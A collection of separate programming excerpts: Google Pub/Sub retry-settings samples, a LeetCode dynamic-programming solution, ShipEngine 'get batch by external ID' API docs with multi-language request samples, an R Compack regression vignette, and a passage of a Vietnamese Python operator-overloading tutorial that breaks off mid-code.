publisher.Flush();
int count = 0;
for (auto& f : done) {
if (f.get()) ++count;
}
std::cout << count << " messages sent successfully\n";
}
Java
import com.google.api.core.ApiFuture;
import com.google.api.gax.retrying.RetrySettings;
import com.google.cloud.pubsub.v1.Publisher;
import com.google.protobuf.ByteString;
import com.google.pubsub.v1.PubsubMessage;
import com.google.pubsub.v1.TopicName;
import java.io.IOException;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.TimeUnit;
import org.threeten.bp.Duration;
public class PublishWithRetrySettingsExample {
public static void main(String... args) throws Exception {
// TODO(developer): Replace these variables before running the sample.
String projectId = "your-project-id";
String topicId = "your-topic-id";
publishWithRetrySettingsExample(projectId, topicId);
}
public static void publishWithRetrySettingsExample(String projectId, String topicId)
throws IOException, ExecutionException, InterruptedException {
TopicName topicName = TopicName.of(projectId, topicId);
Publisher publisher = null;
try {
// Retry settings control how the publisher handles retry-able failures
Duration initialRetryDelay = Duration.ofMillis(100); // default: 100 ms
double retryDelayMultiplier = 2.0; // back off for repeated failures, default: 1.3
Duration maxRetryDelay = Duration.ofSeconds(60); // default : 60 seconds
Duration initialRpcTimeout = Duration.ofSeconds(1); // default: 5 seconds
double rpcTimeoutMultiplier = 1.0; // default: 1.0
Duration maxRpcTimeout = Duration.ofSeconds(600); // default: 600 seconds
Duration totalTimeout = Duration.ofSeconds(600); // default: 600 seconds
RetrySettings retrySettings =
RetrySettings.newBuilder()
.setInitialRetryDelay(initialRetryDelay)
.setRetryDelayMultiplier(retryDelayMultiplier)
.setMaxRetryDelay(maxRetryDelay)
.setInitialRpcTimeout(initialRpcTimeout)
.setRpcTimeoutMultiplier(rpcTimeoutMultiplier)
.setMaxRpcTimeout(maxRpcTimeout)
.setTotalTimeout(totalTimeout)
.build();
// Create a publisher instance with default settings bound to the topic
publisher = Publisher.newBuilder(topicName).setRetrySettings(retrySettings).build();
String message = "first message";
ByteString data = ByteString.copyFromUtf8(message);
PubsubMessage pubsubMessage = PubsubMessage.newBuilder().setData(data).build();
// Once published, returns a server-assigned message id (unique within the topic)
ApiFuture<String> messageIdFuture = publisher.publish(pubsubMessage);
String messageId = messageIdFuture.get();
System.out.println("Published a message with retry settings: " + messageId);
} finally {
if (publisher != null) {
// When finished with the publisher, shutdown to free up resources.
publisher.shutdown();
publisher.awaitTermination(1, TimeUnit.MINUTES);
}
}
}
}
Node.js
/**
* TODO(developer): Uncomment these variables before running the sample.
*/
// const projectId = 'YOUR_PROJECT_ID'
// const topicName = 'YOUR_TOPIC_NAME';
// const data = JSON.stringify({foo: 'bar'});
// Imports the Google Cloud client library. v1 is for the lower level
// proto access.
const {v1} = require('@google-cloud/pubsub');
// Creates a publisher client.
const publisherClient = new v1.PublisherClient({
// optional auth parameters
});
async function publishWithRetrySettings() {
const formattedTopic = publisherClient.projectTopicPath(
projectId,
topicName
);
// Publishes the message as a string, e.g. "Hello, world!" or JSON.stringify(someObject)
const dataBuffer = Buffer.from(data);
const messagesElement = {
data: dataBuffer,
};
const messages = [messagesElement];
// Build the request
const request = {
topic: formattedTopic,
messages: messages,
};
// Retry settings control how the publisher handles retryable failures
// Default values are shown
const retrySettings = {
retryCodes: [
10, // 'ABORTED'
1, // 'CANCELLED',
4, // 'DEADLINE_EXCEEDED'
13, // 'INTERNAL'
8, // 'RESOURCE_EXHAUSTED'
14, // 'UNAVAILABLE'
2, // 'UNKNOWN'
],
backoffSettings: {
// The initial delay time, in milliseconds, between the completion
// of the first failed request and the initiation of the first retrying request.
initialRetryDelayMillis: 100,
// The multiplier by which to increase the delay time between the completion
// of failed requests, and the initiation of the subsequent retrying request.
retryDelayMultiplier: 1.3,
// The maximum delay time, in milliseconds, between requests.
// When this value is reached, retryDelayMultiplier will no longer be used to increase delay time.
maxRetryDelayMillis: 60000,
// The initial timeout parameter to the request.
initialRpcTimeoutMillis: 5000,
// The multiplier by which to increase the timeout parameter between failed requests.
rpcTimeoutMultiplier: 1.0,
// The maximum timeout parameter, in milliseconds, for a request. When this value is reached,
// rpcTimeoutMultiplier will no longer be used to increase the timeout.
maxRpcTimeoutMillis: 600000,
// The total time, in milliseconds, starting from when the initial request is sent,
// after which an error will be returned, regardless of the retrying attempts made meanwhile.
totalTimeoutMillis: 600000,
},
};
const [response] = await publisherClient.publish(request, {
retry: retrySettings,
});
console.log(`Message ${response.messageIds} published.`);
}
publishWithRetrySettings().catch(console.error);
Python
from google import api_core
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# topic_id = "your-topic-id"
# Configure the retry settings. Defaults shown in comments are values applied
# by the library by default, instead of default values in the Retry object.
custom_retry = api_core.retry.Retry(
initial=0.250, # seconds (default: 0.1)
maximum=90.0, # seconds (default: 60.0)
multiplier=1.45, # default: 1.3
deadline=300.0, # seconds (default: 60.0)
predicate=api_core.retry.if_exception_type(
api_core.exceptions.Aborted,
api_core.exceptions.DeadlineExceeded,
api_core.exceptions.InternalServerError,
api_core.exceptions.ResourceExhausted,
api_core.exceptions.ServiceUnavailable,
api_core.exceptions.Unknown,
api_core.exceptions.Cancelled,
),
)
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project_id, topic_id)
for n in range(1, 10):
data = "Message number {}".format(n)
# Data must be a bytestring
data = data.encode("utf-8")
future = publisher.publish(topic=topic_path, data=data, retry=custom_retry)
print(future.result())
print(f"Published messages with retry settings to {topic_path}.")
|
Description
Given a m x n grid filled with non-negative numbers, find a path from top left to bottom right which minimizes the sum of all numbers along its path.
Note: You can only move either down or right at any point in time.
Example:
Input:[ [1,3,1], [1,5,1], [4,2,1] ]Output:7Explanation:Because the path 1→3→1→1→1 minimizes the sum.
Explanation
dp(i,j)=grid(i,j)+min(dp(i+1,j),dp(i,j+1))
Python Solution
class Solution:
def minPathSum(self, grid: List[List[int]]) -> int:
min_paths = [[0 for j in range(0, len(grid[0]))] for i in range(0, len(grid))]
min_paths[0][0] = grid[0][0]
for j in range(1, len(grid[0])):
min_paths[0][j] = min_paths[0][j - 1] + grid[0][j]
for i in range(1, len(grid)):
min_paths[i][0] = min_paths[i - 1][0] + grid[i][0]
for i in range(1, len(grid)):
for j in range(1, len(grid[0])):
min_paths[i][j] = min(min_paths[i][j - 1], min_paths[i - 1][j]) + grid[i][j]
return min_paths[len(grid) - 1][len(grid[0]) - 1]
Time complexity: O(MN). We traverse the entire matrix once.
Space complexity: O(MN). Another matrix of the same size is used.
|
Get a Batch By External Batch ID
tip
Requirements
Please make sure you read the Using Batches documentation first.
Example
GET /v1/batches/external_batch_id/:external_batch_id
GET /v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46 HTTP/1.1
Host: api.shipengine.com
API-Key: __YOUR_API_KEY_HERE__
curl -iX GET https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46 \
-H 'API-Key: __YOUR_API_KEY_HERE__' \
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Host", "api.shipengine.com")
$headers.Add("API-Key", "__YOUR_API_KEY_HERE__")
$response = Invoke-RestMethod 'https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46' -Method 'GET' -Headers $headers -Body $body
$response | ConvertTo-Json
var myHeaders = new Headers();
myHeaders.append("Host", "api.shipengine.com");
myHeaders.append("API-Key", "__YOUR_API_KEY_HERE__");
var requestOptions = {
method: 'GET',
headers: myHeaders,
redirect: 'follow'
};
fetch("https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46", requestOptions)
.then(response => response.text())
.then(result => console.log(result))
.catch(error => console.log('error', error));
var request = require('request');
var options = {
'method': 'GET',
'url': 'https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46',
'headers': {
'Host': 'api.shipengine.com',
'API-Key': '__YOUR_API_KEY_HERE__'
}
};
request(options, function (error, response) {
if (error) throw new Error(error);
console.log(response.body);
});
<?php
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => "https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46",
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => "",
CURLOPT_MAXREDIRS => 10,
CURLOPT_TIMEOUT => 0,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
CURLOPT_CUSTOMREQUEST => "GET",
CURLOPT_HTTPHEADER => array(
"Host: api.shipengine.com",
"API-Key: __YOUR_API_KEY_HERE__"
),
));
$response = curl_exec($curl);
curl_close($curl);
echo $response;
import requests
url = "https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46"
payload = {}
headers = {
'Host': 'api.shipengine.com',
'API-Key': '__YOUR_API_KEY_HERE__'
}
response = requests.request("GET", url, headers=headers, data = payload)
print(response.text.encode('utf8'))
require "uri"
require "net/http"
url = URI("https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46")
https = Net::HTTP.new(url.host, url.port);
https.use_ssl = true
request = Net::HTTP::Get.new(url)
request["Host"] = "api.shipengine.com"
request["API-Key"] = "__YOUR_API_KEY_HERE__"
response = https.request(request)
puts response.read_body
var client = new RestClient("https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46");
client.Timeout = -1;
var request = new RestRequest(Method.GET);
request.AddHeader("Host", "api.shipengine.com");
request.AddHeader("API-Key", "__YOUR_API_KEY_HERE__");
IRestResponse response = client.Execute(request);
Console.WriteLine(response.Content);
OkHttpClient client = new OkHttpClient().newBuilder()
.build();
Request request = new Request.Builder()
.url("https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46")
.method("GET", null)
.addHeader("Host", "api.shipengine.com")
.addHeader("API-Key", "__YOUR_API_KEY_HERE__")
.build();
Response response = client.newCall(request).execute();
package main
import (
"fmt"
"net/http"
"io/ioutil"
)
func main() {
url := "https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46"
method := "GET"
client := &http.Client {
}
req, err := http.NewRequest(method, url, nil)
if err != nil {
fmt.Println(err)
}
req.Header.Add("Host", "api.shipengine.com")
req.Header.Add("API-Key", "__YOUR_API_KEY_HERE__")
res, err := client.Do(req)
defer res.Body.Close()
body, err := ioutil.ReadAll(res.Body)
fmt.Println(string(body))
}
#import <Foundation/Foundation.h>
dispatch_semaphore_t sema = dispatch_semaphore_create(0);
NSMutableURLRequest *request = [NSMutableURLRequest requestWithURL:[NSURL URLWithString:@"https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46"]
cachePolicy:NSURLRequestUseProtocolCachePolicy
timeoutInterval:10.0];
NSDictionary *headers = @{
@"Host": @"api.shipengine.com",
@"API-Key": @"__YOUR_API_KEY_HERE__"
};
[request setAllHTTPHeaderFields:headers];
[request setHTTPMethod:@"GET"];
NSURLSession *session = [NSURLSession sharedSession];
NSURLSessionDataTask *dataTask = [session dataTaskWithRequest:request
completionHandler:^(NSData *data, NSURLResponse *response, NSError *error) {
if (error) {
NSLog(@"%@", error);
} else {
NSHTTPURLResponse *httpResponse = (NSHTTPURLResponse *) response;
NSError *parseError = nil;
NSDictionary *responseDictionary = [NSJSONSerialization JSONObjectWithData:data options:0 error:&parseError];
NSLog(@"%@",responseDictionary);
dispatch_semaphore_signal(sema);
}
}];
[dataTask resume];
dispatch_semaphore_wait(sema, DISPATCH_TIME_FOREVER);
import Foundation
var semaphore = DispatchSemaphore (value: 0)
var request = URLRequest(url: URL(string: "https://api.shipengine.com/v1/batches/external_batch_id/32cc2f34-5d9e-466c-8e3f-62c38ad9dc46")!,timeoutInterval: Double.infinity)
request.addValue("api.shipengine.com", forHTTPHeaderField: "Host")
request.addValue("__YOUR_API_KEY_HERE__", forHTTPHeaderField: "API-Key")
request.httpMethod = "GET"
let task = URLSession.shared.dataTask(with: request) { data, response, error in
guard let data = data else {
print(String(describing: error))
return
}
print(String(data: data, encoding: .utf8)!)
semaphore.signal()
}
task.resume()
semaphore.wait()
{
"label_layout": null,
"label_format": null,
"batch_id": "se-1013790",
"external_batch_id": "32cc2f34-5d9e-466c-8e3f-62c38ad9dc46",
"batch_notes": "2019-7-25 Morning Shipments",
"created_at": "2019-07-25T15:24:46.657Z",
"errors": 0,
"warnings": 0,
"completed": 0,
"forms": 0,
"count": 1,
"batch_shipments_url": {
"href": "https://api.shipengine.com/v1/shipments?batch_id=se-1013790"
},
"batch_labels_url": {
"href": "https://api.shipengine.com/v1/labels?batch_id=se-1013790"
},
"batch_errors_url": {
"href": "https://api.shipengine.com/v1/batches/se-1013790/errors"
},
"label_download": {
"href": "https://api.shipengine.com/v1/downloads/1/uths7PctKUqbM4OfmgzXLg/label-1013790.pdf"
},
"form_download": {
"href": "https://api.shipengine.com/v1/downloads/1/xKVZeKA650-bvQB_oriYkQ/form-1013790.pdf"
},
"status": "open"
}
{
"label_layout": null,
"label_format": null,
"batch_id": "se-1013790",
"external_batch_id": "32cc2f34-5d9e-466c-8e3f-62c38ad9dc46",
"batch_notes": "2019-7-25 Morning Shipments",
"created_at": "2019-07-25T15:24:46.657Z",
"errors": 0,
"warnings": 0,
"completed": 0,
"forms": 0,
"count": 1,
"batch_shipments_url": {
"href": "https://api.shipengine.com/v1/shipments?batch_id=se-1013790"
},
"batch_labels_url": {
"href": "https://api.shipengine.com/v1/labels?batch_id=se-1013790"
},
"batch_errors_url": {
"href": "https://api.shipengine.com/v1/batches/se-1013790/errors"
},
"label_download": {
"href": "https://api.shipengine.com/v1/downloads/1/uths7PctKUqbM4OfmgzXLg/label-1013790.pdf"
},
"form_download": {
"href": "https://api.shipengine.com/v1/downloads/1/xKVZeKA650-bvQB_oriYkQ/form-1013790.pdf"
},
"status": "open"
}
|
Install the package
## on CRAN
## install.packages("Compack")
library(Compack)
Regression with functional compostional predictors
Generate data
library(Compack)
df_beta = 5
p = 30
beta_C_true = matrix(0, nrow = p, ncol = df_beta)
beta_C_true[1, ] <- c(-0.5, -0.5, -0.5 , -1, -1)
beta_C_true[2, ] <- c(0.8, 0.8, 0.7, 0.6, 0.6)
beta_C_true[3, ] <- c(-0.8, -0.8 , 0.4 , 1 , 1)
beta_C_true[4, ] <- c(0.5, 0.5, -0.6 ,-0.6, -0.6)
n_train = 50
n_test = 30
Data <- Fcomp_Model(n = n_train, p = p, m = 0, intercept = TRUE,
SNR = 4, sigma = 3, rho_X = 0.6, rho_T = 0.2,
df_beta = df_beta, n_T = 20, obs_spar = 1, theta.add = FALSE,
beta_C = as.vector(t(beta_C_true)))
arg_list <- as.list(Data$call)[-1]
arg_list$n <- n_test
Test <- do.call(Fcomp_Model, arg_list)
sparse log-contrast regression with functional compositonal predictors
m1 <- FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = df_beta)
plot(m1, xlab = "-log")
betamat <- coef(m1)
predmat <- predict(m1, Data$data$Comp, Data$data$Zc)
Cross-Validation tuned model
linearly contrained group lasso creterion: CGL
k_list = c(4,5,6)
nfolds = 10
foldid <- sample(rep(seq(nfolds), length = n_train))
## cv_cgl: Constrained group lasso
cv_cgl <- cv.FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = k_list, foldid = foldid,
keep = TRUE)
plot(cv_cgl,k = k_list)
cv_cgl$Ftrim[c("lam.min", "lam.1se")]
## $lam.min
## lam df
## 0.005003941 4.000000000
##
## $lam.1se
## lam df
## 0.01203433 4.00000000
beta <- coef(cv_cgl, trim = FALSE, s = "lam.min")
k_opt <- cv_cgl$Ftrim$lam.min['df']
plot(cv_cgl$FuncompCGL.fit[[as.character(k_opt)]])
m1 <- ifelse(is.null(ncol(Data$data$Zc)), 0, ncol(Data$data$Zc))
m1 <- m1 + Data$data$intercept
if(k_opt == df_beta) {
plot(Data$beta, col = "red", pch = 19,
ylim = range(c(range(Data$beta), range(beta))))
abline(v= seq(from = 0, to = (p*df_beta), by = df_beta ))
abline(h = 0)
points(beta)
if(m1 > 0) points(p*df_beta + 1:m1, tail(Data$beta, m1),
col = "blue", pch = 19)
} else {
plot(beta, ylim = range(c(range(Data$beta), range(beta))) )
abline(v= seq(from = 0, to = (p*k_opt), by = k_opt ))
abline(h = 0, col = "red")
if(m1 > 0) points(p*k_opt + 1:m1, tail(Data$beta, m1),
col = "blue", pch = 19)
}
beta_C <- matrix(beta[1:(p*k_opt)], byrow = TRUE, nrow = p)
## satisfies zero-sum constraints
cat("colSums:", colSums(beta_C))
## colSums: 4.167479e-09 -5.502439e-09 -9.87453e-09 -5.177147e-09
Nonzero <- (1:p)[apply(beta_C, 1, function(x) max(abs(x)) >0)]
cat("selected groups:", Nonzero)
## selected groups: 1 2 3 4 6 7 8 9 10 12 14 15 21 25 27 28 30
sseq <- Data$basis.info[, 1]
beta_curve_true <- Data$basis.info[, -1] %*% t(beta_C_true)
Nonzero_true <- (1:p)[apply(beta_C_true, 1, function(x) max(abs(x)) >0)]
matplot(sseq, beta_curve_true, type = "l", ylim = range(beta_curve_true),
ylab = "True coeffcients curves", xlab = "TIME")
abline(a = 0, b = 0, col = "grey", lwd = 2)
text(0, beta_curve_true[1, Nonzero_true], labels = Nonzero_true)
beta_curve <- splines::bs(sseq, df = k_opt, intercept = TRUE) %*% t(beta_C)
matplot(sseq, beta_curve, type = "l", ylim = range(beta_curve_true),
ylab = "Estimated coefficient curves", xlab = "TIME")
abline(a = 0, b = 0, col = "grey", lwd = 2)
text(0, beta_curve[1, Nonzero], labels = Nonzero)
## set a thresholding for variable selection via cross-validation model
## example: cut by average L2-norm for estiamted coefficient curves
Curve_L2 <- colSums(beta_curve^2)
Curve_L2 <- Curve_L2 - colSums(beta_curve[c(1, nrow(beta_curve)), ]^2) / 2
Curve_L2 <- Curve_L2 * (Data$basis.info[2,1] - Data$basis.info[1,1])
Curve_L2 <- sqrt(Curve_L2)
plot(Curve_L2, xlab = "Component index", ylab = "L2-norm for coefficient curves")
cutoff <- sum(Curve_L2) / p
Nonzero_cut <- (1:p)[which(Curve_L2 >= cutoff)]
cat("selected groups after thresholding cut-off:", Nonzero_cut)
## selected groups after thresholding cut-off: 1 2 3 4
y_hat <- predict(cv_cgl, Data$data$Comp, Data$data$Zc, s = "lam.min")
MSE <- sum((drop(Data$data$y) - y_hat)^2) / n_train
y_hat <- predict(cv_cgl, Test$data$Comp, Test$data$Zc, s = "lam.min")
PRE <- sum((drop(Test$data$y) - y_hat)^2) / n_test
cgl_result <- list(cv.result = cv_cgl, beta = beta,
Nonzero = c("Original" = Nonzero, "Cut" = Nonzero_cut),
MSE = MSE, PRE = PRE)
ignoring the fact of one-sum for compositional data: naive
## set mu_raio = 0 to identifying without linear constraints,
## no outer_loop for Lagrange augmented multiplier
cv_naive <- cv.FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = k_list, foldid = foldid, keep = TRUE,
mu_ratio = 0)
plot(cv_naive, k = k_list)
beta <- coef(cv_naive, trim = FALSE, s = "lam.min")
k_opt <- cv_naive$Ftrim$lam.min['df']
beta_C <- matrix(beta[1:(p*k_opt)], byrow = TRUE, nrow = p)
## does NOT satisfy zero-sum constraints
cat("colSums:", colSums(beta_C))
## colSums: -0.2672194 -0.1827702 0.1566777 -0.2521267
Nonzero <- (1:p)[apply(beta_C, 1, function(x) max(abs(x)) >0)]
beta_curve <- splines::bs(sseq, df = k_opt, intercept = TRUE) %*% t(beta_C)
Curve_L2 <- colSums(beta_curve^2) - colSums(beta_curve[c(1, nrow(beta_curve)), ]^2) / 2
Curve_L2 <- sqrt(Curve_L2 * (Data$basis.info[2,1] - Data$basis.info[1,1]))
cutoff <- sum(Curve_L2) / p
Nonzero_cut <- (1:p)[which(Curve_L2 >= cutoff)]
MSE <- sum((drop(Data$data$y) - predict(cv_naive, Data$data$Comp, Data$data$Zc, s = "lam.min"))^2) / n_train
PRE <- sum((drop(Test$data$y) - predict(cv_naive, Test$data$Comp, Test$data$Zc, s = "lam.min"))^2) / n_test
naive_result <- list(cv.result = cv_naive, beta = beta,
Nonzero = c("Original" = Nonzero, "Cut" = Nonzero_cut),
MSE = MSE, PRE = PRE)
random select a component of the compostion as reference level
## mu_ratio is set to 0 automatically once ref is set to a integer
ref = sample(1:p, 1)
cv_base <- cv.FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = k_list, foldid = foldid, keep = TRUE,
ref = ref)
plot(cv_base, k = k_list)
beta <- coef(cv_base, trim = FALSE, s = "lam.min")
k_opt <- cv_base$Ftrim$lam.min['df']
beta_C <- matrix(beta[1:(p*k_opt)], byrow = TRUE, nrow = p)
## satisfies zero-sum constraints
cat("colSums:", colSums(beta_C))
## colSums: -3.469447e-18 2.168404e-18 2.602085e-18 6.938894e-18
Nonzero <- (1:p)[apply(beta_C, 1, function(x) max(abs(x)) >0)]
beta_curve <- splines::bs(sseq, df = k_opt, intercept = TRUE) %*% t(beta_C)
Curve_L2 <- colSums(beta_curve^2) - colSums(beta_curve[c(1, nrow(beta_curve)), ]^2) / 2
Curve_L2 <- sqrt(Curve_L2 * (Data$basis.info[2,1] - Data$basis.info[1,1]))
cutoff <- sum(Curve_L2) / p
Nonzero_cut <- (1:p)[which(Curve_L2 >= cutoff)]
MSE <- sum((drop(Data$data$y) - predict(cv_base, Data$data$Comp, Data$data$Zc, s = "lam.min"))^2) / n_train
PRE <- sum((drop(Test$data$y) - predict(cv_base, Test$data$Comp, Test$data$Zc, s = "lam.min"))^2) / n_test
base_result <- list(cv.result = cv_base, beta = beta,
Nonzero = c("Original" = Nonzero, "Cut" = Nonzero_cut),
MSE = MSE, PRE = PRE)
GIC tuned model
linearly contrained group lasso creterion: CGL
GIC_cgl <- GIC.FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = k_list)
beta <- coef(GIC_cgl)
plot(GIC_cgl)
y_hat <- predict(GIC_cgl, Znew = Test$data$Comp, Zcnew = Test$data$Zc)
plot(Test$data$y, y_hat, xlab = "Observed response", ylab = "Predicted response")
ignoring the fact of one-sum for compositional data: naive
GIC_naive <- GIC.FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = k_list, mu_ratio = 0)
beta <- coef(GIC_naive)
plot(GIC_naive)
y_hat <- predict(GIC_naive, Znew = Test$data$Comp, Zcnew = Test$data$Zc)
plot(Test$data$y, y_hat, xlab = "Observed response", ylab = "Predicted response")
random select a component of the compostion as reference level
GIC_base <- GIC.FuncompCGL(y = Data$data$y, X = Data$data$Comp,
Zc = Data$data$Zc, intercept = Data$data$intercept,
k = k_list, ref = ref)
beta <- coef(GIC_base)
plot(GIC_base)
y_hat <- predict(GIC_base, Znew = Test$data$Comp, Zcnew = Test$data$Zc)
plot(Test$data$y, y_hat, xlab = "Observed response", ylab = "Predicted response")
Regression with compositional predictors
Generate data
library(Compack)
p = 30
n = 50
beta = c(1, -0.8, 0.6, 0, 0, -1.5, -0.5, 1.2)
beta = c(beta, rep(0, times = p - length(beta)))
Comp_data = comp_Model(n = n, p = p, beta = beta, intercept = FALSE)
Comp_data2 = comp_Model(n = n, p = p, beta = Comp_data$beta, intercept = FALSE)
sparse log-contrast regression with compositonal predictors
m1 <- compCL(y = Comp_data$y, Z = Comp_data$X.comp,
Zc = Comp_data$Zc, intercept = Comp_data$intercept)
plot(m1, label = TRUE)
coef(m1)[1:10, 90:100]
## L90 L91 L92 L93 L94 L95
## Z1 0.92406820 0.92547909 0.92393318 0.92468211 0.92482516 0.92499664
## Z2 -0.66133490 -0.66328703 -0.66439024 -0.66621092 -0.66758205 -0.66890518
## Z3 0.58299125 0.58434121 0.58253225 0.58270957 0.58266568 0.58257745
## Z4 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
## Z5 0.04906269 0.04925977 0.05387758 0.05507937 0.05690799 0.05856053
## Z6 -1.44762276 -1.44781669 -1.45108388 -1.45185109 -1.45315509 -1.45438880
## Z7 -0.29034027 -0.29063399 -0.29528538 -0.29726352 -0.29908001 -0.30087369
## Z8 1.02544144 1.02813418 1.03215631 1.03528559 1.03798521 1.04059747
## Z9 -0.01258296 -0.01473562 -0.01643933 -0.01842473 -0.01998444 -0.02156272
## Z10 -0.11472875 -0.11498203 -0.11470839 -0.11519857 -0.11511888 -0.11536527
## L96 L97 L98 L99 L100
## Z1 0.92528297 0.92544175 0.92555603 0.92573786 0.92614382
## Z2 -0.67023889 -0.67159139 -0.67288982 -0.67415268 -0.67543773
## Z3 0.58278803 0.58302517 0.58317946 0.58337527 0.58363210
## Z4 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
## Z5 0.05989629 0.06128825 0.06265640 0.06387050 0.06490137
## Z6 -1.45558553 -1.45673691 -1.45775937 -1.45876054 -1.46061136
## Z7 -0.30234935 -0.30400968 -0.30576860 -0.30729023 -0.30818420
## Z8 1.04290265 1.04505940 1.04710022 1.04896656 1.05050565
## Z9 -0.02305226 -0.02429200 -0.02541595 -0.02649356 -0.02785752
## Z10 -0.11561523 -0.11568306 -0.11564942 -0.11550258 -0.11480866
Cross-Validation tuned model
cvm1 <- cv.compCL(y = Comp_data$y, Z = Comp_data$X.comp,
Zc = Comp_data$Zc, intercept = Comp_data$intercept)
plot(cvm1, xlab = "-log")
beta_est <- coef(cvm1, s = "lam.min")
head(beta_est, 10)
## 1
## Z1 0.90048789
## Z2 -0.62012673
## Z3 0.58372632
## Z4 0.00000000
## Z5 0.01756609
## Z6 -1.38814631
## Z7 -0.23387376
## Z8 0.94222496
## Z9 0.00000000
## Z10 -0.09116647
sum(beta_est[1:p]) # satisfies zero-sum constraint
## [1] 5.516289e-09
y_hat <- predict(cvm1, Comp_data2$X.comp, Comp_data2$Zc, s = "lam.min")
GIC tuned model
GICm1 <- GIC.compCL(y = Comp_data$y, Z = Comp_data$X.comp,
Zc = Comp_data$Zc, intercept = Comp_data$intercept)
plot(GICm1, xlab = "-log")
beta_est <- coef(GICm1, s = "lam.min")
head(beta_est, 10)
## 1
## Z1 0.85898896
## Z2 -0.56310354
## Z3 0.58218204
## Z4 0.00000000
## Z5 0.00000000
## Z6 -1.32214479
## Z7 -0.14017233
## Z8 0.82199822
## Z9 0.00000000
## Z10 -0.08630774
sum(beta_est[1:p]) # satisfies zero-sum constraint
## [1] 6.958372e-09
y_hat <- predict(GICm1, Comp_data2$X.comp, Comp_data2$Zc, s = "lam.min")
|
Nạp chồng toán tử trong Python
Bạn có thể thay đổi ý nghĩa của toán tử trong Python tùy thuộc vào toán hạng được sử dụng và ta gọi đó là nạp chồng toán tử.
Nạp chồng toán tử trong Python là gì?
Toán tử Python làm việc bằng các hàm được dựng sẵn, nhưng một toán tử có thể được sử dụng để thực hiện nhiều hoạt động khác nhau. Ví dụ với toán tử ' + ', bạn có thể cộng số học hai số với nhau, có thể kết hợp hai danh sách, hoặc nối hai chuỗi khác nhau lại…
Tính năng này trong Python gọi là nạp chồng toán tử, cho phép cùng một toán tử được sử dụng khác nhau tùy từng ngữ cảnh.
Vậy vấn đề gì sẽ xảy ra khi ta sử dụng nạp chồng toán tử với object của một lớp do người dùng khai báo? Hãy theo dõi ví dụ mô phỏng một điểm trong hệ tọa độ hai chiều sau:
class Point:
def __init__(self, x = 0, y = 0):
self.x = x
self.y = y
Ta chạy chương trình và nhập vào các điểm:
>>> p1 = Point(2,3)
>>> p2 = Point(-1,2)
>>> p1 + p2
Traceback (most recent call last):
...
TypeError: unsupported operand type(s) for +: 'Point' and 'Point'
Chương trình ngay lập tức báo lỗi TypeError vì Python không thể nhận hai đối tượng Point cùng lúc.
Để xử lý vấn đề này, ta sẽ sử dụng nạp chồng toán tử.
Trước tiên hãy tìm hiểu qua một số hàm đặc biệt sau đây.
Các hàm đặc biệt trong Python
Hàm trong Class được bắt đầu với hai dấu gạch dưới liền nhau (__) là các hàm đặc biệt, mang các ý nghĩa đặc biệt.
Có rất nhiều hàm đặc biệt trong Python và một trong đó là hàm __init__() mà Quantrimang đã giới thiệu trước đó trong bài học về Class và Object. Hàm này được gọi bất cứ khi nào khởi tạo một đối tượng, một biến mới trong class.
Mục đích khi sử dụng các hàm đặc biệt này là giúp những hàm của chúng ta tương thích với các hàm được dựng sẵn trong Python.
>>> p1 = Point(2,3)
>>> print(p1)
<__main__.Point object at 0x00000000031F8CC0>
Bạn nên khai báo phương thức __str__() trong class để kiểm soát cách hiển thị kết quả được in ra.
class Point:
def __init__(self, x = 0, y = 0):
self.x = x
self.y = y
def __str__(self):
return "({0},{1})".format(self.x,self.y)
Và bây giờ thử lại với hàm print()
>>> p1 = Point(2,3)
>>> print(p1)
(2,3)
Sử dụng __str__() làm kết quả hiển thị chuẩn hơn. Ngoài ra bạn có thể in ra kết quả tương tự bằng cách sử dụng hàm tích hợp sẵn trong Python là str() hoặc format().
>>> str(p1)
'(2,3)'
>>> format(p1)
'(2,3)'
Khi sử dụng str() và format(), Python thực hiện lệnh gọi p1.__str__() nên kết quả được trả về tương tự.
Nạp chồng toán tử ' + ' trong Python
Để nạp chồng toán tử ' + ', ta sẽ sử dụng hàm __add__() trong class. Ta có thể triển khai nhiều công việc bằng hàm này, ví dụ như cộng hai điểm tọa độ ở ví dụ bên trên.
class Point:
